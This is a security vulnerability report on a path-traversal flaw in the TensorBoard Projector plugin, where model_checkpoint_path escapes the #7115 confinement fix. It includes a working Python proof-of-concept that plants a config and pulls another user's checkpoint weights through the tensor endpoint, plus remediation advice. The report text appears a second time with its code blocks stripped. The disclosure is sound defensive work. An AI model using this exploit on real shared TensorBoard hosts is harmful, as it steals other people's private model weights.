Reporting here as advised in https://issuetracker.google.com/issues/522459885
Package: tensorboard (PyPI), TensorBoard Projector plugin
Affected Versions: current main at commit deb522a (the #7115 fix), and all prior versions
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory (Path Traversal)
Summary
Commit deb522a ("Fix Projector Plugin vulnerability (#7115)") hardened the Projector plugin so that the user controlled asset paths in projector_config.pbtxt (metadata_path, tensor_path, bookmarks_path, and sprite.image_path) are resolved against, and confined to, the directory that contains projector_config.pbtxt. The fix did not cover a fifth user controlled path in the same config file: model_checkpoint_path. That field is still passed straight to tf.train.load_checkpoint() with no confinement check. An attacker who can write or influence a projector_config.pbtxt under a scanned logdir (the exact threat model the #7115 fix addresses) can point model_checkpoint_path at any TensorFlow checkpoint elsewhere on the host. TensorBoard then enumerates that checkpoint's variables, advertises them in the served config, and returns their raw tensor bytes through the /data/plugin/projector/tensor route. This discloses the contents of other users' or other tenants' private model checkpoints (the model weights), which on a shared training host or multi tenant TensorBoard deployment is the most sensitive asset present.
Details
The fix added _rel_to_abs_asset_path() (tensorboard/plugins/projector/projector_plugin.py:212), which resolves a candidate path and rejects it when it escapes the config directory:
def _rel_to_abs_asset_path(fpath, config_fpath):
config_dir = os.path.realpath(os.path.dirname(os.path.expanduser(config_fpath)))
candidate = os.path.expanduser(fpath)
if not os.path.isabs(candidate):
candidate = os.path.join(config_dir, candidate)
candidate = os.path.realpath(candidate)
error_message = 'Asset path "%s" resolves outside the config directory' % (fpath)
try:
common_path = os.path.commonpath([config_dir, candidate])
except ValueError as e:
raise ValueError(error_message) from e
if common_path != config_dir:
raise ValueError(error_message)
return candidate
The four patched fields route through this function: tensor_path (line 380 and 680), metadata_path (line 620), bookmarks_path (line 752), and sprite.image_path (line 801). Pointing any of those at a path outside the logdir now returns a clean 400.
model_checkpoint_path does not. It is read from the attacker controlled config in _read_latest_config_files() (text_format.Parse(file_content, config), line 457), checked only for existence with a glob, and then handed directly to the checkpoint reader in _get_reader_for_run():
# tensorboard/plugins/projector/projector_plugin.py
478 if (
479 config.model_checkpoint_path
480 and _using_tf()
481 and not tf.io.gfile.glob(config.model_checkpoint_path + "*") # existence only
482 ):
...
498 if config.model_checkpoint_path and _using_tf():
499 try:
500 reader = tf.train.load_checkpoint(config.model_checkpoint_path) # no confinement
There is no call to _rel_to_abs_asset_path(config.model_checkpoint_path, ...) anywhere, so the path is never confined to the config directory.
The readback is automatic and does not require the attacker to know any variable names. In _augment_configs_with_checkpoint_info() the reader enumerates every 2D variable in the target checkpoint and adds it to the served config:
415 var_map = reader.get_variable_to_shape_map()
416 for tensor_name, tensor_shape in var_map.items():
417 if len(tensor_shape) != 2:
418 continue
...
425 embedding = config.embeddings.add()
426 embedding.tensor_name = tensor_name
That augmented config is returned by /data/plugin/projector/config. The client then requests each tensor, and _serve_tensor() returns the raw bytes:
699 reader = self._get_reader_for_run(run)
...
709 tensor = reader.get_tensor(name)
...
719 data_bytes = tensor.tobytes()
720 return Respond(request, data_bytes, "application/octet-stream")
So the full chain is: attacker plants projector_config.pbtxt with model_checkpoint_path pointing outside the logdir, the config endpoint discloses the variable names and shapes of that out of logdir checkpoint, and the tensor endpoint returns the raw weights. This is the same class of issue, in the same file and same config message, that #7115 set out to close for the other path fields.
The read is constrained to valid TensorFlow checkpoint files (a non checkpoint path such as /etc/passwd fails load_checkpoint() and is caught), so this is not arbitrary file read of any file. In TensorBoard's own domain that constraint still exposes the highest value data on the host: trained model weights from other users' runs.
PoC
This reproduces against the real plugin code at commit deb522a. It writes a "victim" checkpoint outside the logdir, plants a malicious projector_config.pbtxt that points at it, and shows the weights coming back out of the tensor endpoint.
python3 -m venv tbvenv
./tbvenv/bin/pip install tensorflow-cpu werkzeug pillow grpcio-tools
# generate the plugin's protobuf modules in the checkout (run from the repo root):
./tbvenv/bin/python -m grpc_tools.protoc -I. --python_out=. $(find tensorboard -name '*.proto')
./tbvenv/bin/python poc_model_checkpoint_path.py
poc_model_checkpoint_path.py:
import os, sys, json, tempfile
import numpy as np
sys.path.insert(0, ".") # use this checkout
import tensorflow as tf
from werkzeug.test import Client
from tensorboard.plugins.projector import projector_plugin
from tensorboard.plugins import base_plugin
work = tempfile.mkdtemp(prefix="tb_poc_")
# Victim's PRIVATE checkpoint, OUTSIDE the shared logdir.
secret_dir = os.path.join(work, "victim_private", "secret_model")
os.makedirs(secret_dir)
SECRET = np.array([[1337.0, 7331.0, 4242.0],
[9001.0, 1234.0, 5678.0]], dtype=np.float32)
ckpt = tf.train.Checkpoint(stolen_weights=tf.Variable(SECRET, name="stolen_weights"))
prefix = ckpt.write(os.path.join(secret_dir, "model.ckpt"))
# Attacker controlled shared logdir: a malicious config that points outside it.
logdir = os.path.join(work, "shared_logdir")
os.makedirs(logdir)
with open(os.path.join(logdir, "projector_config.pbtxt"), "w") as f:
f.write('model_checkpoint_path: "%s"\n' % prefix)
assert not os.path.realpath(prefix).startswith(os.path.realpath(logdir))
plugin = projector_plugin.ProjectorPlugin(
base_plugin.TBContext(logdir=logdir, data_provider=None))
def get(handler, query):
return Client(handler).get("/?" + query)
cfg = get(plugin._serve_config, "run=.").get_data(as_text=True)
name = json.loads(cfg)["embeddings"][0]["tensorName"] # auto-discovered, no prior knowledge
data = get(plugin._serve_tensor, "run=.&name=%s" % name).get_data()
print("exfiltrated:", np.frombuffer(data, dtype=np.float32).tolist())
print("victim secret:", SECRET.flatten().tolist())
Observed output:
exfiltrated: [1337.0, 7331.0, 4242.0, 9001.0, 1234.0, 5678.0]
victim secret: [1337.0, 7331.0, 4242.0, 9001.0, 1234.0, 5678.0]
For contrast, calling the patched helper with the same out of logdir path is rejected:
_rel_to_abs_asset_path("/.../victim_private/secret_model/model.ckpt", "/.../shared_logdir/projector_config.pbtxt")
-> ValueError: Asset path "..." resolves outside the config directory
confirming the other four fields are confined while model_checkpoint_path is not.
Impact
Information disclosure (CWE-22). An attacker who can write or influence a projector_config.pbtxt under a logdir that TensorBoard scans, which is the threat model the #7115 fix explicitly targets ("deployments where an attacker can write or influence projector_config.pbtxt contents under a scanned logdir"), can cause TensorBoard to read any TensorFlow checkpoint on the host that the TensorBoard process can access, and return its variable names, shapes, and raw weight tensors over HTTP. On a shared training host or a multi tenant TensorBoard instance this exposes other users' private model weights. No TensorBoard credentials are required, and the attacker does not need to know any variable names in advance because the config endpoint enumerates them. The impact is confidentiality only; the target must be a valid TensorFlow checkpoint, so it is not arbitrary read of any file type. This is an incomplete fix of #7115 and should be closed the same way the four sibling fields were: by confining model_checkpoint_path to the config directory.
Reporting here as advised in https://issuetracker.google.com/issues/522459885
Package: tensorboard (PyPI), TensorBoard Projector plugin
Affected Versions: current main at commit deb522a (the #7115 fix), and all prior versions
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory (Path Traversal)
Summary
Commit deb522a ("Fix Projector Plugin vulnerability (#7115)") hardened the Projector plugin so that the user controlled asset paths in
projector_config.pbtxt(metadata_path,tensor_path,bookmarks_path, andsprite.image_path) are resolved against, and confined to, the directory that containsprojector_config.pbtxt. The fix did not cover a fifth user controlled path in the same config file:model_checkpoint_path. That field is still passed straight totf.train.load_checkpoint()with no confinement check. An attacker who can write or influence aprojector_config.pbtxtunder a scanned logdir (the exact threat model the #7115 fix addresses) can pointmodel_checkpoint_pathat any TensorFlow checkpoint elsewhere on the host. TensorBoard then enumerates that checkpoint's variables, advertises them in the served config, and returns their raw tensor bytes through the/data/plugin/projector/tensorroute. This discloses the contents of other users' or other tenants' private model checkpoints (the model weights), which on a shared training host or multi tenant TensorBoard deployment is the most sensitive asset present.Details
The fix added
_rel_to_abs_asset_path()(tensorboard/plugins/projector/projector_plugin.py:212), which resolves a candidate path and rejects it when it escapes the config directory:The four patched fields route through this function:
tensor_path(line 380 and 680),metadata_path(line 620),bookmarks_path(line 752), andsprite.image_path(line 801). Pointing any of those at a path outside the logdir now returns a clean400.model_checkpoint_pathdoes not. It is read from the attacker controlled config in_read_latest_config_files()(text_format.Parse(file_content, config), line 457), checked only for existence with a glob, and then handed directly to the checkpoint reader in_get_reader_for_run():There is no call to
_rel_to_abs_asset_path(config.model_checkpoint_path, ...)anywhere, so the path is never confined to the config directory.The readback is automatic and does not require the attacker to know any variable names. In
_augment_configs_with_checkpoint_info()the reader enumerates every 2D variable in the target checkpoint and adds it to the served config:That augmented config is returned by
/data/plugin/projector/config. The client then requests each tensor, and_serve_tensor()returns the raw bytes:So the full chain is: attacker plants
projector_config.pbtxtwithmodel_checkpoint_pathpointing outside the logdir, the config endpoint discloses the variable names and shapes of that out of logdir checkpoint, and the tensor endpoint returns the raw weights. This is the same class of issue, in the same file and same config message, that #7115 set out to close for the other path fields.The read is constrained to valid TensorFlow checkpoint files (a non checkpoint path such as
/etc/passwdfailsload_checkpoint()and is caught), so this is not arbitrary file read of any file. In TensorBoard's own domain that constraint still exposes the highest value data on the host: trained model weights from other users' runs.PoC
This reproduces against the real plugin code at commit deb522a. It writes a "victim" checkpoint outside the logdir, plants a malicious
projector_config.pbtxtthat points at it, and shows the weights coming back out of the tensor endpoint.poc_model_checkpoint_path.py:Observed output:
For contrast, calling the patched helper with the same out of logdir path is rejected:
confirming the other four fields are confined while
model_checkpoint_pathis not.Impact
Information disclosure (CWE-22). An attacker who can write or influence a
projector_config.pbtxtunder a logdir that TensorBoard scans, which is the threat model the #7115 fix explicitly targets ("deployments where an attacker can write or influence projector_config.pbtxt contents under a scanned logdir"), can cause TensorBoard to read any TensorFlow checkpoint on the host that the TensorBoard process can access, and return its variable names, shapes, and raw weight tensors over HTTP. On a shared training host or a multi tenant TensorBoard instance this exposes other users' private model weights. No TensorBoard credentials are required, and the attacker does not need to know any variable names in advance because the config endpoint enumerates them. The impact is confidentiality only; the target must be a valid TensorFlow checkpoint, so it is not arbitrary read of any file type. This is an incomplete fix of #7115 and should be closed the same way the four sibling fields were: by confiningmodel_checkpoint_pathto the config directory.